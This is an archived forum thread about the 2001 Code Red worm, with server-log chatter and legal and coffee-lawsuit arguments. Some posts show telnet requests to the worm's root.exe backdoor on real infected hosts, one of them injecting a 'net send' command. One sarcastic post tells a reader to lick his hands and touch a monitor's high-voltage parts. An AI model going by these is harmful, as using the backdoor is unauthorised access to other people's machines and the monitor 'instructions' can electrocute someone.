I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.

Great! One significant change has been suggested:

telnet x.x.x.x 80
GET /scripts/root.exe?/c+net+send+%2A+Machine+%25COMPU TERNAME%25+has+been+infected+by+the+Code+Red+II+wo rm+and+attacked+my+server HTTP/1.0

%2A is *, which will send to all machines on a workgroup in a workgroup configuration, and I would presume all machines on a domain as well. This should be fairly easy to automate... but it's late, so I'll let someone else play with this.

This just goes to show...

[Refried+Beans]

.. how MS software sucks.

The worm should get 400 "Bad Request" on any HTTP server. That's not 404 "File not found." The worm has two spaces between the URL and the HTTP version. The spec says one and only one. So Apache, Zope, and any other sane HTTP server will throw out the request. Sure, it's a quick fix for both MS and the worm writer on this point, but still. RTFRFC!

White Hat Hacking

[Swaffs]

Creating an Apache script that patches any infected hosts would be pretty cool, but I'll be impressed when someone writes a script that installs Linux/Apache on infected hosts.

Re:Try pulling the IP up in your browser

[Pathwalker]

I've been having fun with that myself - I have a list of everyone who hit me here.
Lots are home users who probably don't realize that they have IIS running, but there are a few sites that look like decent sized places.

Log of any interest?

[CaNuK]

Some stats I ran to see how many times my personal firewall blocked access to my computer on port 80 on a daily basis. Just your typical computer with an always on connection. Very many of them originating from 24.*.*.* Oh, an there currently isn't (and won't be because who cares) a script for generating these. And I grabbed an username that's appropriate. I hope somebody cares. Wait, no I don't.

List of CodeRed IPs here

[leonbrooks]

This sorted list (updated hourly) are the IPs for CodeRed attacks on a single IP address in Western Australia.

Last week: 92

Last 32 hours: 196 (175 unique addresses)

Looks like it's concrete bunker time soon... )-:

Microsoft Internet Pollution - My Server Log!

[BigBlockMopar]

Microsoft's products spew pollution into the information space like a burning mountain of tires.

For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).

This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.

Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.

Re:Microsoft Internet Pollution - My Server Log!

[Dr.+A.+van+Code]

A glance at it shows that most of the hits are from Code Red III (XXXX rather than NNNN), the one that also tries to subvert cmd.exe and crack a shell. You should grep -c your logs for X's and N's; I'd be very interested in seeing what the relative frequency is of the variants.

Legal Issues Re: MS Liability For Wasted bandwidth

[David+Hume]

"Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?"

"Nope, look at your EULA"

" Microsoft's EULA prohibits me from suing them for bandwith charges for the stuff their crap throws at my Linux/Apache setup?"

" Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whos servers are infected(and hence spamming your box)."

The statement that the "EULA still applies" is incorrect. The EULA is not binding on anyone who is not a party to the contract (i.e., the End User License Agreement). There is no privity of contract.

Whether Microsoft could be sued under these circumstances raises an interesting, and to my knowledge unprecedented legal issue. It may be possible. One could assert a civil action for negligence. The plaintiffs would argue that but for Microsoft's negligence, they would not have incurred the bandwidth costs.

Microsoft would, undoubtedly among other things, deny that it was negligent, and raise issues regarding proximate / legal cause, as well as intervening cause.

Let me give you a *possibly* analogous example from the world of torts. You leave your keys in your car, and the doors unlocked. Perpetrator steels your car, is chased by the police, and runs over and kills a child. Perpetrator has no assets. The child's parents sue you for negligence for the wrongful death of their child. Result?

If you say you are not liable, then add these facts. The evidence shows that: (a) you left your car in a horrible neighborhood where cars are routinely stolen; and (b) you knew this fact. Result?

If you still say you are not liable, then add the fact that your car had itself been previously stolen on four occasions within the past year. Result?

I wouldn't be surprised if a well-funded law firm filed a class action lawsuit against MS for negligence and other causes of action. It would be a reach, and very expensive, but the publicity and potential pay off might make it worth it.

Better procmail filter!

[BigBlockMopar]

:0 B
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HD o8OkQ6SD
/dev/null

Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:

:0 B
* X-mailer=Outlook
/dev/null

:)

Re:But is the fix freely available???

[omega9]

The patch is free. Think about it. We already know that Microsoft sucks, but charging for security patches would take them to a new plane of sucking.

Could you imagine if it was run that way? "Yeah, we'll fix our (already) buggy server for you (that we charged you through the nose for). But it's gonna' cost you more."

Omega9
$chown us base

What do you do with that command prompt?

[fanatic]

telnet 216.227.114.45 80
Trying 216.227.114.45...
Connected to 216.227.114.45.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Mon, 06 Aug 2001 03:23:07 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\InetPub\scripts>

So now that I've got this, what do I do? Entering commands (such as 'dir') hangs.

Re:Someone needs to write

[DNS-and-BIND]

wget isn't exactly what you could call a standard tool, much less on win32.

It's a Trilogy!

[kermit1221]

Rules for successfully surviving a trilogy:

Step 1: Don't run Microsoft servers (duh...)
Step 2: ?
Step 3: Repent! (if you ever ran an MS server)

Work for the enemy...

[Secret+Coward]

A server at Randall Publishing has attacked my machine 16 times so far. I just sent in an application to work their. It says:

Hi,

I would like to work in your Information Technology department. The first thing I would do, is delete the Code Red worm from your web server, and apply a month-old patch to protect it from future exploits.

Self Defense?

[nettdata]

I wonder if you could claim something like self-defense for something like this?

I'm being actively attacked, multiple times, by someone elses hacked machine. That is an "unauthorized intrusion" attempt into my machine. If I go and perform an "unauthorized intrusion" on their machine in order to shut them down so as to protect my own services, why would I get in trouble for that?

Sure, it's not like the guy tried to shoot me and I had to shoot back to protect myself, but it seems like a proportionate response to me.

At least, that's MY way of thinking.

You think McDonalds is *wrong* to make hot coffee?

[BigBlockMopar]

The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.

You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.

I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.

I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.

Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.

I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.

As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothely. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.

One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.

Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.

Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.

GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occured. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all concious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.

Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.

The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.

Changes things a little, doesn't it? How survivable is that accident?

Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.

Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.

AOL...

[DraKKon]

Though you'd like this... AOL has been hit by the Code Red worm.. Its unconfirmed wether its version 1 or 2, but Warner Brothers in the US and UK networks are down. AHHAHAHAHAHAH AOL SUCKS!

Non-English sites seem to be at more risk

[leonbrooks]

patch is available, MS patches known to cause other issues, we hear it

A disproportionate number of the hits on my (Australian) web servers [sources] are from asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.

If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.

Disinfection is hard, need service packs

[leonbrooks]

Extra credit: Disinfect the machine with the security patch from the MS Web Site.

Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.

Apache...probably redundant

[Neoplasm]

Checking some of the IP addresses in my firewall log, I'm getting the default web pages for Apache...even on Red Hat...is there some way that someone can change the pages on an infected machine? For example, check out http://209.5.115.231/ for example, or http://209.236.45.125/

Confused@home

Re:Apache...probably redundant

[Neoplasm]

God, I am such a doofus...ignore my comments above. There are so many "HTTP port probe" messages in my log that the garden variety RPC and TCP port probes got lost in the mess.

Lobster?! *Whatever* you do...

[Morbid+Curiosity]

Don't put a lobster on a plate!
He'll use his magnet to escape!
He'll jump right up and claw your ear,
And then he'll bite your EYE!

Re:You think McDonalds is *wrong* to make hot coff

[BigBlockMopar]

I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.

Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.

I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.

So? I carefully put my coffee aside and let it cool.

As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.

You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.

And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.

Re:You think McDonalds is *wrong* to make hot coff

[BigBlockMopar]

If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.

Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.